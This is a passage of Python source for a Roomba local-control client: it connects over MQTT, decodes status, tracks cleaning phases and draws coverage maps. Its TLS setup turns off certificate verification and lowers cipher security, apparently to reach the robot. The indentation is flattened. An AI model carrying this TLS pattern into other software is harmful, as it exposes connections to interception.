'''
address is the IP address of the Roomba, the continuous flag enables a
continuous mqtt connection, if this is set to False, the client connects
and disconnects every 'delay' seconds (1 by default, but can be
changed). This is to allow other programs access, as there can only be
one Roomba connection at a time.
As cloud connections are unaffected, I reccomend leaving this as True.
leave topic as is, unless debugging (# = all messages).
if a python standard logging object exists, it will be used for logging.
'''
self.debug = False
self.log = logging.getLogger("roomba.__main__") #modified to work with new scheme NW 15/9/2017
#self.log = logging.getLogger(__name__+'.Roomba')
if self.log.getEffectiveLevel() == logging.DEBUG:
self.debug = True
self.address = address
if not cert_name:
self.cert_name = "/etc/ssl/certs/ca-certificates.crt"
else:
self.cert_name = cert_name
self.continuous = continuous
if self.continuous:
self.log.info("CONTINUOUS connection")
else:
self.log.info("PERIODIC connection")
# set the following to True to enable pretty printing of json data
self.pretty_print = False
self.stop_connection = False
self.periodic_connection_running = False
self.clean = clean
self.roomba_port = 8883
self.blid = blid
self.password = password
self.roombaName = roombaName
self.topic = topic
self.mqttc = None
self.exclude = ""
self.delay = 1
self.roomba_connected = False
self.indent = 0
self.master_indent = 0
self.raw = False
self.drawmap = False
self.previous_co_ords = self.co_ords = self.zero_coords()
self.fnt = None
self.home_pos = None
self.angle = 0
self.cleanMissionStatus_phase = ""
self.previous_cleanMissionStatus_phase = ""
self.current_state = None
self.last_completed_time = None
self.bin_full = False
self.base = None #base map
self.dock_icon = None #dock icon
self.roomba_icon = None #roomba icon
self.roomba_cancelled_icon = None #roomba cancelled icon
self.roomba_battery_icon = None #roomba battery low icon
self.roomba_error_icon = None #roomba error icon
self.bin_full_icon = None #bin full icon
self.room_outline_contour = None
self.room_outline = None
self.transparent = (0, 0, 0, 0) #transparent
self.previous_display_text = self.display_text = None
self.master_state = {}
self.time = time.time()
self.update_seconds = 300 #update with all values every 5 minutes
self.show_final_map = True
self.client = None
if self.address is None or blid is None or password is None:
self.read_config_file(file)
def read_config_file(self, file="./config.ini"):
#read config file
Config = configparser.ConfigParser()
try:
Config.read(file)
except Exception as e:
self.log.warn("Error reading config file %s" %e)
self.log.info("No Roomba specified, and no config file found - "
"attempting discovery")
if Password(self.address, file):
return self.read_config_file(file)
else:
return False
self.log.info("reading info from config file %s" % file)
addresses = Config.sections()
if self.address is None and len(addresses):
if len(addresses) > 1:
self.log.warn("config file has entries for %d Roombas, "
"only configuring the first!")
self.address = addresses[0]
if self.address:
self.blid = Config.get(self.address, "blid")
self.password = Config.get(self.address, "password")
else:
self.log.warn("Error reading config file %s" % file)
return False
# self.roombaName = literal_eval(
# Config.get(self.address, "data"))["robotname"]
return True
def setup_client(self):
if self.client is None:
if not HAVE_MQTT:
print("Please install paho-mqtt 'pip install paho-mqtt' "
"to use this library")
return False
self.client = mqtt.Client(
client_id=self.blid, clean_session=self.clean,
protocol=mqtt.MQTTv311)
# Assign event callbacks
self.client.on_message = self.on_message
self.client.on_connect = self.on_connect
self.client.on_publish = self.on_publish
self.client.on_subscribe = self.on_subscribe
self.client.on_disconnect = self.on_disconnect
# Uncomment to enable debug messages
# client.on_log = self.on_log
# set TLS, self.cert_name is required by paho-mqtt, even if the
# certificate is not used...
# but v1.3 changes all this, so have to do the following:
self.log.info("Setting TLS")
try:
self.client.tls_set(
self.cert_name, cert_reqs=ssl.CERT_NONE,
tls_version=ssl.PROTOCOL_TLS, ciphers='DEFAULT@SECLEVEL=1')
except (ValueError, FileNotFoundError): # try V1.3 version
self.log.warn("TLS Setting failed - trying 1.3 version")
self.client._ssl_context = None
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_NONE
context.load_default_certs()
context.set_ciphers('DEFAULT@SECLEVEL=1') # NW added 12/11/2019
self.client.tls_set_context(context)
except:
self.log.error("Error setting TLS: %s" % traceback.format_exc())
# disables peer verification
self.client.tls_insecure_set(True)
self.client.username_pw_set(self.blid, self.password)
self.log.info("Setting TLS - OK")
return True
return False
def connect(self):
if self.address is None or self.blid is None or self.password is None:
self.log.critical("Invalid address, blid, or password! All these "
"must be specified!")
sys.exit(1)
if self.roomba_connected or self.periodic_connection_running: return
if self.continuous:
if not self._connect():
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
else:
self._thread = threading.Thread(target=self.periodic_connection)
self._thread.daemon = True
self._thread.start()
self.time = time.time() #save connect time
def _connect(self, count=0, new_connection=False):
max_retries = 3
try:
if self.client is None or new_connection:
self.log.info("Connecting %s" % self.roombaName)
self.setup_client()
self.client.connect(self.address, self.roomba_port, 60)
else:
self.log.info("Attempting to Reconnect %s" % self.roombaName)
self.client.loop_stop()
self.client.reconnect()
self.client.loop_start()
return True
except Exception as e:
self.log.error("Error: %s " % e)
exc_type, exc_obj, exc_tb = sys.exc_info()
# self.log.error("Exception: %s" % exc_type)
# if e[0] == 111: #errno.ECONNREFUSED - does not work with
# python 3.0 so...
if exc_type == socket.error or exc_type == ConnectionRefusedError:
count += 1
if count <= max_retries:
self.log.error("Attempting new Connection# %d" % count)
time.sleep(1)
self._connect(count, True)
if count == max_retries:
self.log.error("Unable to connect %s" % self.roombaName)
return False
def disconnect(self):
if self.continuous:
self.client.disconnect()
else:
self.stop_connection = True
def periodic_connection(self):
# only one connection thread at a time!
if self.periodic_connection_running: return
self.periodic_connection_running = True
while not self.stop_connection:
if self._connect():
time.sleep(self.delay)
self.client.disconnect()
time.sleep(self.delay)
self.client.disconnect()
self.periodic_connection_running = False
def on_connect(self, client, userdata, flags, rc):
self.log.info("Roomba Connected %s" % self.roombaName)
if rc == 0:
self.roomba_connected = True
self.client.subscribe(self.topic)
else:
self.log.error("Roomba Connected with result code " + str(rc))
self.log.error("Please make sure your blid and password are "
"correct %s" % self.roombaName)
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
def on_message(self, mosq, obj, msg):
# print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
if self.exclude != "":
if self.exclude in msg.topic:
return
if self.indent == 0:
self.master_indent = max(self.master_indent, len(msg.topic))
log_string, json_data = self.decode_payload(msg.topic,msg.payload)
self.dict_merge(self.master_state, json_data)
if self.pretty_print:
self.log.info("%-{:d}s : %s".format(self.master_indent)
% (msg.topic,log_string))
else:
self.log.info("Received Roomba Data %s: %s, %s"
% (self.roombaName, str(msg.topic), str(msg.payload)))
if self.raw:
self.publish(msg.topic, msg.payload)
else:
self.decode_topics(json_data)
# default every 5 minutes
if time.time() - self.time > self.update_seconds:
self.log.info("Publishing master_state %s" % self.roombaName)
self.decode_topics(self.master_state) # publish all values
self.time = time.time()
def on_publish(self, mosq, obj, mid):
pass
def on_subscribe(self, mosq, obj, mid, granted_qos):
self.log.debug("Subscribed: %s %s" % (str(mid), str(granted_qos)))
def on_disconnect(self, mosq, obj, rc):
self.roomba_connected = False
if rc != 0:
self.log.warn("Unexpected Disconnect From Roomba %s! - reconnecting"
% self.roombaName)
else:
self.log.info("Disconnected From Roomba %s" % self.roombaName)
def on_log(self, mosq, obj, level, string):
self.log.info(string)
def set_mqtt_client(self, mqttc=None, brokerFeedback=""):
self.mqttc = mqttc
if self.mqttc is not None:
if self.roombaName != "":
self.brokerFeedback = brokerFeedback + "/" + self.roombaName
else:
self.brokerFeedback = brokerFeedback
def send_command(self, command):
self.log.info("Received COMMAND: %s" % command)
Command = OrderedDict()
Command["command"] = command
Command["time"] = self.totimestamp(datetime.datetime.now())
Command["initiator"] = "localApp"
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Command : %s" % myCommand)
self.client.publish("cmd", myCommand)
def set_preference(self, preference, setting):
self.log.info("Received SETTING: %s, %s" % (preference, setting))
val = False
if setting.lower() == "true":
val = True
tmp = {preference: val}
Command = {"state": tmp}
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Setting : %s" % myCommand)
self.client.publish("delta", myCommand)
def publish(self, topic, message):
if self.mqttc is not None and message is not None:
self.log.debug("Publishing item: %s: %s"
% (self.brokerFeedback + "/" + topic, message))
self.mqttc.publish(self.brokerFeedback + "/" + topic, message)
def set_options(self, raw=False, indent=0, pretty_print=False):
self.raw = raw
self.indent = indent
self.pretty_print = pretty_print
if self.raw:
self.log.info("Posting RAW data")
else:
self.log.info("Posting DECODED data")
def enable_map(self, enable=False, mapSize="(800,1500,0,0,0,0)",
mapPath=".", iconPath = "./", roomOutline=True,
enableMapWithText=True,
fillColor="lawngreen",
outlineColor=(64,64,64,255),
outlineWidth=1,
home_icon_file="home.png",
roomba_icon_file="roomba.png",
roomba_error_file="roombaerror.png",
roomba_cancelled_file="roombacancelled.png",
roomba_battery_file="roomba-charge.png",
bin_full_file="binfull.png",
roomba_size=(50,50), draw_edges = 30, auto_rotate=True):
'''
Enable live map drawing. mapSize is x,y size, x,y offset of docking
station ((0,0) is the center of the image) final value is map rotation
(in case map is not straight up/down). These values depend on the
size/shape of the area Roomba covers. Offset depends on where you place
the docking station. This will need some experimentation to get right.
You can supply 32x32 icons for dock and roomba etc. If the files don't
exist, crude representations are made. If you specify home_icon_file as
None, then no dock is drawn. Draw edges attempts to draw straight lines
around the final (not live) map, and Auto_rotate (on/off) attempts to
line the map up vertically. These only work if you have openCV
installed. otherwise a PIL version is used, which is not as good (but
less CPU intensive). roomOutline enables the previous largest saved
outline to be overlayed on the map (so you can see where cleaning was
missed). This is on by default, but the alignment doesn't work so well,
so you can turn it off.
Returns map enabled True/False
'''
if not HAVE_PIL: #can't draw a map without PIL!
return False
if Image.PILLOW_VERSION < "4.1.1":
print("WARNING: PIL version is %s, this is not the latest! you "
"can get bad memory leaks with old versions of PIL"
% Image.PILLOW_VERSION)
print("run: 'pip install --upgrade pillow' to fix this")
self.drawmap = enable
if self.drawmap:
self.log.info("MAP: Maps Enabled")
self.mapSize = literal_eval(mapSize)
if len(mapSize) < 6:
self.log.error("mapSize is required, and is of the form "
"(800,1500,0,0,0,0) - (x,y size, x,y dock loc,"
"theta1, theta2), map,roomba roatation")
self.drawmap = False
return False
self.angle = self.mapSize[4]
self.roomba_angle = self.mapSize[5]
self.mapPath = mapPath
if home_icon_file is None:
self.home_icon_file = None
else:
self.home_icon_file = os.path.join(iconPath, home_icon_file)
self.roomba_icon_file = os.path.join(iconPath, roomba_icon_file)
self.roomba_error_file = os.path.join(iconPath, roomba_error_file)
self.roomba_cancelled_file = os.path.join(iconPath, roomba_cancelled_file)
self.roomba_battery_file = os.path.join(iconPath, roomba_battery_file)
self.bin_full_file = os.path.join(iconPath, bin_full_file)
self.draw_edges = draw_edges // 10000
self.auto_rotate = auto_rotate
if not roomOutline:
self.log.info("MAP: Not drawing Room Outline")
self.roomOutline = roomOutline
self.enableMapWithText = enableMapWithText
self.fillColor = fillColor
self.outlineColor = outlineColor
self.outlineWidth = outlineWidth
self.initialise_map(roomba_size)
return True
return False
def totimestamp(self, dt):
td = dt - datetime.datetime(1970, 1, 1)
return int(td.total_seconds())
def dict_merge(self, dct, merge_dct):
""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead
of updating only top-level keys, dict_merge recurses down into dicts
nested to an arbitrary depth, updating keys. The ``merge_dct`` is
merged into ``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in six.iteritems(merge_dct):
if (k in dct and isinstance(dct[k], dict)
and isinstance(merge_dct[k], Mapping)):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def decode_payload(self, topic, payload):
'''
Format json for pretty printing, return string sutiable for logging,
and a dict of the json data
'''
indent = self.master_indent + 31 #number of spaces to indent json data
try:
# if it's json data, decode it (use OrderedDict to preserve keys
# order), else return as is...
json_data = json.loads(
payload.decode("utf-8").replace(":nan", ":NaN").\
replace(":inf", ":Infinity").replace(":-inf", ":-Infinity"),
object_pairs_hook=OrderedDict)
# if it's not a dictionary, probably just a number
if not isinstance(json_data, dict):
return json_data, dict(json_data)
json_data_string = "\n".join((indent * " ") + i for i in \
(json.dumps(json_data, indent = 2)).splitlines())
formatted_data = "Decoded JSON: \n%s" % (json_data_string)
except ValueError:
formatted_data = payload
if self.raw:
formatted_data = payload
return formatted_data, dict(json_data)
def decode_topics(self, state, prefix=None):
'''
decode json data dict, and publish as individual topics to
brokerFeedback/topic the keys are concatinated with _ to make one unique
topic name strings are expressely converted to strings to avoid unicode
representations
'''
for k, v in six.iteritems(state):
if isinstance(v, dict):
if prefix is None:
self.decode_topics(v, k)
else:
self.decode_topics(v, prefix+"_"+k)
else:
if isinstance(v, list):
newlist = []
for i in v:
if isinstance(i, dict):
for ki, vi in six.iteritems(i):
newlist.append((str(ki), vi))
else:
if isinstance(i, six.string_types):
i = str(i)
newlist.append(i)
v = newlist
if prefix is not None:
k = prefix+"_"+k
# all data starts with this, so it's redundant
k = k.replace("state_reported_","")
# save variables for drawing map
if k == "pose_theta":
self.co_ords["theta"] = v
if k == "pose_point_x": #x and y are reversed...
self.co_ords["y"] = v
if k == "pose_point_y":
self.co_ords["x"] = v
if k == "bin_full":
self.bin_full = v
if k == "cleanMissionStatus_error":
try:
self.error_message = self._ErrorMessages[v]
except KeyError as e:
self.log.warn(
"Error looking up Roomba error message %s" % e)
self.error_message = "Unknown Error number: %s" % v
self.publish("error_message", self.error_message)
if k == "cleanMissionStatus_phase":
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
self.cleanMissionStatus_phase = v
self.publish(k, str(v))
if prefix is None:
self.update_state_machine()
def update_state_machine(self, new_state = None):
'''
Roomba progresses through states (phases), current identified states
are:
"" : program started up, no state yet
"run" : running on a Cleaning Mission
"hmUsrDock" : returning to Dock
"hmMidMsn" : need to recharge
"hmPostMsn" : mission completed
"charge" : chargeing
"stuck" : Roomba is stuck
"stop" : Stopped
"pause" : paused
available states:
states = { "charge":"Charging",
"new":"New Mission",
"run":"Running",
"resume":"Running",
"hmMidMsn":"Recharging",
"recharge":"Recharging",
"stuck":"Stuck",
"hmUsrDock":"User Docking",
"dock":"Docking",
"dockend":"Docking - End Mission",
"cancelled":"Cancelled",
"stop":"Stopped",
"pause":"Paused",
"hmPostMsn":"End Mission",
"":None}
Normal Sequence is "" -> charge -> run -> hmPostMsn -> charge
Mid mission recharge is "" -> charge -> run -> hmMidMsn -> charge
-> run -> hmPostMsn -> charge
Stuck is "" -> charge -> run -> hmPostMsn -> stuck
-> run/charge/stop/hmUsrDock -> charge
Start program during run is "" -> run -> hmPostMsn -> charge
Need to identify a new mission to initialize map, and end of mission to
finalise map.
Assume charge -> run = start of mission (init map)
stuck - > charge = init map
Assume hmPostMsn -> charge = end of mission (finalize map)
Anything else = continue with existing map
'''
current_mission = self.current_state
#if self.current_state == None: #set initial state here for debugging
# self.current_state = self.states["recharge"]
# self.show_final_map = False
# deal with "bin full" timeout on mission
try:
if (self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"] == "none" and
self.cleanMissionStatus_phase == "charge" and
(self.current_state == self.states["pause"] or
self.current_state == self.states["recharge"])):
self.current_state = self.states["cancelled"]
except KeyError:
pass
if (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["new"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "hmMidMsn"):
self.current_state = self.states["dock"]
elif (self.current_state == self.states["dock"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"] and
self.cleanMissionStatus_phase == "charge" and self.bin_full):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"]
and self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["pause"]
and self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["pause"]
# so that we will draw map and can update recharge time
current_mission = None
elif (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "charge"):
# so that we will draw map and can update charge status
current_mission = None
elif ((self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]) and
self.cleanMissionStatus_phase == "hmUsrDock"):
self.current_state = self.states["cancelled"]
elif ((self.current_state == self.states["hmUsrDock"] or
self.current_state == self.states["cancelled"]) and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["hmPostMsn"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["dockend"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["charge"]
else:
self.current_state = self.states[self.cleanMissionStatus_phase]
if new_state is not None:
self.current_state = self.states[new_state]
self.log.info("set current state to: %s" % (self.current_state))
if self.current_state != current_mission:
self.log.info("updated state to: %s" % (self.current_state))
self.publish("state", self.current_state)
self.draw_map(current_mission != self.current_state)
def make_transparent(self, image, colour=None):
'''
take image and make white areas transparent
return transparent image
'''
image = image.convert("RGBA")
datas = image.getdata()
newData = []
for item in datas:
# white (ish)
if item[0] >= 254 and item[1] >= 254 and item[2] >= 254:
newData.append(self.transparent)
else:
if colour:
newData.append(colour)
else:
newData.append(item)
image.putdata(newData)
return image
def make_icon(self, input="./roomba.png", output="./roomba_mod.png"):
#utility function to make roomba icon from generic roomba icon
if not HAVE_PIL: #drawing library loaded?
self.log.error("PIL module not loaded")
return None
try:
roomba = Image.open(input).convert('RGBA')
roomba = roomba.rotate(90, expand=False)
roomba = self.make_transparent(roomba)
draw_wedge = ImageDraw.Draw(roomba)
draw_wedge.pieslice(
[(5,0),(roomba.size[0]-5,roomba.size[1])],
175, 185, fill="red", outline="red")
roomba.save(output, "PNG")
return roomba
except Exception as e:
self.log.error("ERROR: %s" % e)
return None
def load_icon(self, filename="", icon_name=None, fnt=None, size=(32,32),
base_icon=None):
'''
Load icon from file, or draw icon if file not found.
returns icon object
'''
if icon_name is None:
return None
try:
icon = Image.open(filename).convert('RGBA').resize(
size,Image.ANTIALIAS)
icon = self.make_transparent(icon)
except IOError as e:
self.log.warn("error loading %s: %s, using default icon instead"
% (icon_name,e))
if base_icon is None:
icon = Image.new('RGBA', size, self.transparent)
else:
icon = base_icon
draw_icon = ImageDraw.Draw(icon)
if icon_name == "roomba":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
355, 5, fill="red", outline="red")
elif icon_name == "stuck":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
draw_icon.polygon([(
icon.size[0]//2,icon.size[1]), (0, 0), (0,icon.size[1])],
fill = 'red')
if fnt is not None:
draw_icon.text((4,-4), "!", font=fnt,
fill=(255,255,255,255))
elif icon_name == "cancelled":
if base_icon is None:
draw_icon.ellipse([(5,5),(icon.size[0]-5,icon.size[1]-5)],
fill="green", outline="black")
draw_icon.pieslice([(5,5),(icon.size[0]-5,icon.size[1]-5)],
175, 185, fill="red", outline="red")
if fnt is not None:
draw_icon.text((4,-4), "X", font=fnt, fill=(255,0,0,255))
elif icon_name == "bin full":
draw_icon.rectangle([
icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10, icon.size[1]+10],
fill = "grey")
if fnt is not None:
draw_icon.text((4,-4), "F", font=fnt,
fill=(255,255,255,255))
elif icon_name == "battery":
draw_icon.rectangle([icon.size[0]-10, icon.size[1]-10,
icon.size[0]+10,icon.size[1]+10], fill = "orange")
if fnt is not None:
draw_icon.text((4,-4), "B", font=fnt,
fill=(255,255,255,255))
elif icon_name == "home":
draw_icon.rectangle([0,0,32,32], fill="red", outline="black")
if fnt is not None:
draw_icon.text((4,-4), "D", font=fnt,
fill=(255,255,255,255))
else:
icon = None
#rotate icon 180 degrees
icon = icon.rotate(180-self.angle, expand=False)
return icon
def initialise_map(self, roomba_size):
'''
Initialize all map items (base maps, overlay, icons fonts etc)
'''
# get base image of Roomba path
if self.base is None:
'''try:
self.log.info("MAP: openening existing line image")
self.base = Image.open(
self.mapPath + '/' + self.roombaName + 'lines.png')\
.convert('RGBA')
if self.base.size != (self.mapSize[0], self.mapSize[1]):
raise IOError("Image is wrong size")
except IOError as e:
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.log.warn("MAP: line image problem: %s: created new image"
% e)
try:
self.log.info("MAP: openening existing problems image")
self.roomba_problem = Image.open(
self.mapPath + '/'+self.roombaName + 'problems.png')\
.convert('RGBA')
if self.roomba_problem.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
self.log.warn("MAP: problems image problem: %s: created new "
"image" % e)'''
self.base = Image.new(
'RGBA',
(self.mapSize[0], self.mapSize[1]), self.transparent)
self.roomba_problem = Image.new(
'RGBA', self.base.size, self.transparent)
try:
self.log.info("MAP: openening existing map no text image")
self.previous_map_no_text = None
self.map_no_text = Image.open(
self.mapPath + '/' + self.roombaName + 'map_notext.png')\
.convert('RGBA')
if self.map_no_text.size != self.base.size:
raise IOError("Image is wrong size")
except IOError as e:
self.map_no_text = None
self.log.warn("MAP: map no text image problem: %s: set to None"
% e)
# save x and y center of image, for centering of final map image
self.cx = self.base.size[0]
self.cy = self.base.size[1]
# get a font
if self.fnt is None:
try:
self.fnt = ImageFont.truetype('FreeMono.ttf', 40)
except IOError as e:
self.log.warn("error loading font: %s, loading default font"
% e)
self.fnt = ImageFont.load_default()
#set dock home position
if self.home_pos is None:
self.home_pos = (
self.mapSize[0] // 2 + self.mapSize[2],
self.mapSize[1] // 2 + self.mapSize[3])
self.log.info("MAP: home_pos: (%d,%d)"
% (self.home_pos[0], self.home_pos[1]))
#get icons
if self.roomba_icon is None:
self.roomba_icon = self.load_icon(
filename=self.roomba_icon_file, icon_name="roomba",
fnt=self.fnt, size=roomba_size, base_icon=None)
if self.roomba_error_icon is None:
self.roomba_error_icon = self.load_icon(
filename=self.roomba_error_file, icon_name="stuck",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_cancelled_icon is None:
self.roomba_cancelled_icon = self.load_icon(
filename=self.roomba_cancelled_file, icon_name="cancelled",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.roomba_battery_icon is None:
self.roomba_battery_icon = self.load_icon(
filename=self.roomba_battery_file, icon_name="battery",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
if self.dock_icon is None and self.home_icon_file is not None:
self.dock_icon = self.load_icon(
filename=self.home_icon_file, icon_name="home", fnt=self.fnt)
self.dock_position = (
self.home_pos[0] - self.dock_icon.size[0] // 2,
self.home_pos[1] - self.dock_icon.size[1] // 2)
if self.bin_full_icon is None:
self.bin_full_icon = self.load_icon(
filename=self.bin_full_file, icon_name="bin full",
fnt=self.fnt, size=roomba_size, base_icon=self.roomba_icon)
self.log.info("MAP: Initialisation complete")
def transparent_paste(self, base_image, icon, position):
'''
needed because PIL pasting of transparent imges gives weird results
'''
image = Image.new('RGBA', self.base.size, self.transparent)
image.paste(icon,position)
base_image = Image.alpha_composite(base_image, image)
return base_image
def zero_coords(self):
'''
returns dictionary with default zero coords
'''
return {"x": 0, "y": 0, "theta": 180}
def offset_coordinates(self, old_co_ords, new_co_ords):
'''
offset coordinates according to mapSize settings, with 0,0 as center
'''
x_y = (new_co_ords["x"] + self.mapSize[0] // 2 + self.mapSize[2],
new_co_ords["y"] + self.mapSize[1] // 2 + self.mapSize[3])
old_x_y = (old_co_ords["x"]+self.mapSize[0] // 2 + self.mapSize[2],
old_co_ords["y"]+self.mapSize[1]//2+self.mapSize[3])
theta = int(new_co_ords["theta"] - 90 + self.roomba_angle)
while theta > 359: theta = 360 - theta
while theta < 0: theta = 360 + theta
return old_x_y, x_y, theta
def get_roomba_pos(self, x_y):
'''
calculate roomba position as list
'''
return [x_y[0] - self.roomba_icon.size[0] // 2,
x_y[1] - self.roomba_icon.size[1] // 2,
x_y[0] + self.roomba_icon.size[0] // 2,
x_y[1] + self.roomba_icon.size[1] // 2]
def draw_vacuum_lines(self, image, old_x_y, x_y, theta):
'''
draw lines on image from old_x_y to x_y reepresenting vacuum coverage,
taking into account angle theta (roomba angle).
'''
lines = ImageDraw.Draw(image)
if x_y != old_x_y:
self.log.info("MAP: drawing line: %s, %s" % (old_x_y, x_y))
lines.line([old_x_y, x_y], fill=self.fillColor,
width=self.roomba_icon.size[0] // 2)
#draw circle over roomba vacuum area to give smooth edges.
arcbox = [x_y[0]-self.roomba_icon.size[0] // 4,
x_y[1]-self.roomba_icon.size[0] // 4,
x_y[0]+self.roomba_icon.size[0] // 4,
x_y[1]+self.roomba_icon.size[0] // 4]
lines.ellipse(arcbox, fill=self.fillColor)
def draw_text(self, image, display_text, fnt, pos=(0,0),
colour=(0,0,255,255), rotate=False):
#draw text - (WARNING old versions of PIL have huge memory leak here!)
if display_text is None: return
self.log.info("MAP: writing text: pos: %s, text: %s"
% (pos, display_text))
if rotate:
txt = Image.new('RGBA', (fnt.getsize(display_text)),
self.transparent)
text = ImageDraw.Draw(txt)
# draw text rotated 180 degrees...
text.text((0,0), display_text, font=fnt, fill=colour)
image.paste(txt.rotate(180-self.angle, expand=True), pos)
else:
text = ImageDraw.Draw(image)
text.text(pos, display_text, font=fnt, fill=colour)
def draw_map(self, force_redraw=False):
'''
Draw map of Roomba cleaning progress
'''
if ((self.co_ords != self.previous_co_ords or
self.cleanMissionStatus_phase !=
self.previous_cleanMissionStatus_phase)
or force_redraw) and self.drawmap:
self.render_map(self.co_ords, self.previous_co_ords)
self.previous_co_ords = self.co_ords.copy()
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
def render_map(self, new_co_ords, old_co_ords):
'''
draw map
'''
draw_final = False
stuck = False
cancelled = False
bin_full = False
battery_low = False
# program just started, and we don't have phase yet.
if self.current_state is None:
return
if self.show_final_map == False:
self.log.info("MAP: received: new_co_ords: %s old_co_ords: %s "
"phase: %s, state: %s" % (
new_co_ords, old_co_ords,
self.cleanMissionStatus_phase, self.current_state))
if self.current_state == self.states["charge"]:
self.log.info("MAP: ignoring new co-ords in charge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Charging: Battery: " + \
str(self.master_state["state"]["reported"]["batPct"]) + "%"
if self.bin_full:
self.display_text = "Bin Full," + \
self.display_text.replace("Charging", "Not Ready")
if (self.last_completed_time is None or time.time() -
self.last_completed_time > 3600):
self.save_text_and_map_on_whitebg(self.map_no_text)
draw_final = True
elif self.current_state == self.states["recharge"]:
self.log.info("MAP: ignoring new co-ords in recharge phase")
new_co_ords = old_co_ords = self.zero_coords()
self.display_text = "Recharging:" + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["rechrgM"]) + "m"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["pause"]:
self.log.info("MAP: ignoring new co-ords in pause phase")
new_co_ords = old_co_ords
self.display_text = "Paused: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
# assume roomba is docked...
new_co_ords = old_co_ords = self.zero_coords()
self.save_text_and_map_on_whitebg(self.map_no_text)
elif self.current_state == self.states["hmPostMsn"]:
self.display_text = "Completed: " + \
time.strftime("%a %b %d %H:%M:%S")
self.log.info("MAP: end of mission")
elif self.current_state == self.states["dockend"]:
self.log.info("MAP: mission completed: ignoring new co-ords in "
"docking phase")
new_co_ords = old_co_ords = self.zero_coords()
self.draw_final_map(True)
draw_final = True
elif (self.current_state == self.states["run"] or
self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]):
if self.current_state == self.states["run"]:
self.display_text = self.states["run"] + " Time: " + \
str(self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"]) + \
"m, Bat: "+ str(self.master_state["state"]["reported"]["batPct"]) + \
"%"
else:
self.display_text = None
self.show_final_map = False
elif self.current_state == self.states["new"]:
self.angle = self.mapSize[4] #reset angle
self.base = Image.new('RGBA', self.base.size, self.transparent)
# overlay for roomba problem position
self.roomba_problem = Image.new('RGBA', self.base.size,
self.transparent)
self.show_final_map = False
self.display_text = None
self.log.info("MAP: created new image at start of new run")
elif self.current_state == self.states["stuck"]:
self.display_text = "STUCK!: " + time.strftime("%a %b %d %H:%M:%S")
self.draw_final_map(True)
draw_final = True
stuck = True
elif self.current_state == self.states["cancelled"]:
self.display_text = "Cancelled: " + \
time.strftime("%a %b %d %H:%M:%S")
cancelled = True
elif self.current_state == self.states["dock"]:
self.display_text = "Docking"
if self.bin_full:
self.display_text = "Bin Full," + self.display_text
bin_full = True
else:
self.display_text = "Battery low: " + \
str(self.master_state["state"]["reported"]["batPct"]) + \
"%, " + self.display_text
battery_low = True
else:
self.log.warn("MAP: no special handling for state: %s"
% self.current_state)
if self.base is None:
self.log.warn("MAP: no image, exiting...")
return
if self.display_text is None:
self.display_text = self.current_state
if self.show_final_map: #just display final map - not live
self.log.debug("MAP: not updating map - Roomba not running")
return
if self.debug:
# debug final map (careful, uses a lot of CPU power!)
self.draw_final_map()
#calculate co-ordinates, with 0,0 as center
old_x_y, x_y, theta = self.offset_coordinates(old_co_ords, new_co_ords)
roomba_pos = self.get_roomba_pos(x_y)
self.log.info("MAP: old x,y: %s new x,y: %s theta: %s roomba pos: %s" %
(old_x_y, x_y, theta, roomba_pos))
#draw lines
self.draw_vacuum_lines(self.base, old_x_y, x_y, theta)
# make a blank image for the text and Roomba overlay, initialized to
# transparent text color
